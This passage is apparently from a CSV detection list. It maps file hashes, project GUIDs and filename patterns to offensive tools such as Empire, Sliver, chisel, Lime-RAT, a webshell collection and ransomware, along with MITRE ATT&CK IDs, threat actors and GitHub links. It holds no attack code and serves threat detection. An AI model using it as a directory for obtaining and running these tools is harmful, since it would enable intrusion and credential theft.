"*36306a3cbeee8bd6405ac58a4800eec4adf403c3c3fb3d70bd7c73e8df17675f*",".{0,1000}36306a3cbeee8bd6405ac58a4800eec4adf403c3c3fb3d70bd7c73e8df17675f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24584" 
"*3637cb58a5fae664a12943bbc979556d11b88b918bf8ab9ab78be4e9d9d3292a*",".{0,1000}3637cb58a5fae664a12943bbc979556d11b88b918bf8ab9ab78be4e9d9d3292a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24586" "*363a083ee261a6b87743076d1f38062c4e23d0938817c63dea8716b694c78c7a*",".{0,1000}363a083ee261a6b87743076d1f38062c4e23d0938817c63dea8716b694c78c7a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24587" "*363A6DE4-59D9-451B-A4FD-1FE763970E1E*",".{0,1000}363A6DE4\-59D9\-451B\-A4FD\-1FE763970E1E.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24588" "*3644992e6ddad57730c25549175afaded580cd12226675105f71525e7d089d24*",".{0,1000}3644992e6ddad57730c25549175afaded580cd12226675105f71525e7d089d24.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and 
adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24590" "*364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452*",".{0,1000}364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24591" 
"*364fd5587812cb5f7f912683f4267573d12a78bb158d9e32272b09ececa7ec70*",".{0,1000}364fd5587812cb5f7f912683f4267573d12a78bb158d9e32272b09ececa7ec70.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24592" "*3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4*",".{0,1000}3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24593" "*3655e26bfd9900a39da92af0cbd8ac57decf67a6f31680db406e8b534c6a94e4*",".{0,1000}3655e26bfd9900a39da92af0cbd8ac57decf67a6f31680db406e8b534c6a94e4.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24594" 
"*3658b250fc3dd383aa2a7cc2add77d00e005129ba54fdf5fdd20570ced68c72f*",".{0,1000}3658b250fc3dd383aa2a7cc2add77d00e005129ba54fdf5fdd20570ced68c72f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24595" "*365-Stealer.py*",".{0,1000}365\-Stealer\.py.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","24596" "*365-Stealer-master*",".{0,1000}365\-Stealer\-master.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","24597" "*366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6*",".{0,1000}366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24599" "*36663e4535c25c63a9debb293737016321c3dec8425eca3fff69ba37a7603d63*",".{0,1000}36663e4535c25c63a9debb293737016321c3dec8425eca3fff69ba37a7603d63.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24600" "*366dfaa9fb6cdd168c41aa608cd363c1953aa2126749000847b5a282835eb0a5*",".{0,1000}366dfaa9fb6cdd168c41aa608cd363c1953aa2126749000847b5a282835eb0a5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24601" "*36855e25edfdc11367442a67a436dbb0cc79454dbf92435de3e6017f25378703*",".{0,1000}36855e25edfdc11367442a67a436dbb0cc79454dbf92435de3e6017f25378703.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - 
TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24602" "*3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c*",".{0,1000}3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24603" "*36922dd433801687ef428a64f1db8195d4efa8112cd7629b283476bce58e1d30*",".{0,1000}36922dd433801687ef428a64f1db8195d4efa8112cd7629b283476bce58e1d30.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","24605" "*3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c*",".{0,1000}3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24608" 
"*36980b0616d902fa05508052ae1ea0224a82b442e45d1756e71c0a911456712a*",".{0,1000}36980b0616d902fa05508052ae1ea0224a82b442e45d1756e71c0a911456712a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24609" "*36a51b581592148e33c4f47c4e4f72710564595b6147b732e203d27a6d7dabb5*",".{0,1000}36a51b581592148e33c4f47c4e4f72710564595b6147b732e203d27a6d7dabb5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24612" "*36a5fc4f46aea01f852923cd75f58793d9aa05abd8567ee8e0ab97c9270b6d1a*",".{0,1000}36a5fc4f46aea01f852923cd75f58793d9aa05abd8567ee8e0ab97c9270b6d1a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24613" "*36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944*",".{0,1000}36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24614" "*36a795ba9dfe58c4e8cac8b24ada8cbee9b598dc7af6ee076de0b09750aea29a*",".{0,1000}36a795ba9dfe58c4e8cac8b24ada8cbee9b598dc7af6ee076de0b09750aea29a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24616" "*36a8df8ded4e69fc68c172aef01afc33ab8576b130987c5708b8dc58f714c4d2*",".{0,1000}36a8df8ded4e69fc68c172aef01afc33ab8576b130987c5708b8dc58f714c4d2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24617" "*36AB45D2-F886-4803-AA7E-6FD5520458FC*",".{0,1000}36AB45D2\-F886\-4803\-AA7E\-6FD5520458FC.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","24618" "*36afa4616649f78e31cf7b67a66fddd9e9d6c532a791aa37c8b64ab6819a2c1f*",".{0,1000}36afa4616649f78e31cf7b67a66fddd9e9d6c532a791aa37c8b64ab6819a2c1f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24619" "*36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859*",".{0,1000}36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24620" "*36b81baa1376efd694fc671e7ad2791b223d31762dc2bb32d919addaf5862f02*",".{0,1000}36b81baa1376efd694fc671e7ad2791b223d31762dc2bb32d919addaf5862f02.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24621" "*36bab647467333a997dac89001fe066779c64dd73815523b956a44157b542bb1*",".{0,1000}36bab647467333a997dac89001fe066779c64dd73815523b956a44157b542bb1.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - 
T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24623" "*36c21ec0ea2bbe57193e5f8354f4be046558921bc3231506f99700243ca18518*",".{0,1000}36c21ec0ea2bbe57193e5f8354f4be046558921bc3231506f99700243ca18518.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","24624" "*36c3075114a8f3fe901eca2b4088929047e82a7d7e762b47fcacd7109eda0407*",".{0,1000}36c3075114a8f3fe901eca2b4088929047e82a7d7e762b47fcacd7109eda0407.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24625" "*36c6235d0a635f47045fb9eb24715bee64d25024c3f33041deeb114efda6e99d*",".{0,1000}36c6235d0a635f47045fb9eb24715bee64d25024c3f33041deeb114efda6e99d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24626" "*36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159*",".{0,1000}36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24627" "*36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875*",".{0,1000}36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#filehash","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","24628" "*36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231*",".{0,1000}36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24629" "*36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15*",".{0,1000}36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - 
T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24631" "*36ddc7f64cb3df2ca4170627c6e0f0dea33d1a6d0730629dff6f5c633f2006f9*",".{0,1000}36ddc7f64cb3df2ca4170627c6e0f0dea33d1a6d0730629dff6f5c633f2006f9.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","24633" "*36E00152-E073-4DA8-AA0C-375B6DD680C4*",".{0,1000}36E00152\-E073\-4DA8\-AA0C\-375B6DD680C4.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#GUIDproject","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","24634" "*36e3d1cc09aff85da9b79e384efe1b8e1db705fa061ff85db3c1ff14e979862e*",".{0,1000}36e3d1cc09aff85da9b79e384efe1b8e1db705fa061ff85db3c1ff14e979862e.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","24635" "*36e459305e1df9cc100dff6ecfc2ef7fd1ef63ad6e989c8c9802533b0f78b9e4*",".{0,1000}36e459305e1df9cc100dff6ecfc2ef7fd1ef63ad6e989c8c9802533b0f78b9e4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24636" "*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*",".{0,1000}36EBF9AA\-2F37\-4F1D\-A2F1\-F2A45DEEAF21.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","#GUIDproject","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","24639" "*36f3846afda7e148c57f944720df6f3de2085d7c49f9a207e1e8bdcda8bd82a4*",".{0,1000}36f3846afda7e148c57f944720df6f3de2085d7c49f9a207e1e8bdcda8bd82a4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24640" "*36f41c33dbc19f8de5e440a192fcc41528838a5840bb21ccdbc390e28086c7cc*",".{0,1000}36f41c33dbc19f8de5e440a192fcc41528838a5840bb21ccdbc390e28086c7cc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24641" 
"*36f45e69b0d6ce0325647dbe792399267ce73266f5cc72ca6f2bd845ba5513c9*",".{0,1000}36f45e69b0d6ce0325647dbe792399267ce73266f5cc72ca6f2bd845ba5513c9.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","24642" "*36f8232a2d7766a7331b76c5edd8b43b9b53cf9b98575d0d010f4ed4a7e34dc1*",".{0,1000}36f8232a2d7766a7331b76c5edd8b43b9b53cf9b98575d0d010f4ed4a7e34dc1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24643" "*36f88cb90ca8084fa93158aaee6b8879fb75ed8c3c12e946a32ffb7ef6023817*",".{0,1000}36f88cb90ca8084fa93158aaee6b8879fb75ed8c3c12e946a32ffb7ef6023817.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24644" "*36F9C306-5F45-4946-A259-610C05BD90DF*",".{0,1000}36F9C306\-5F45\-4946\-A259\-610C05BD90DF.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral 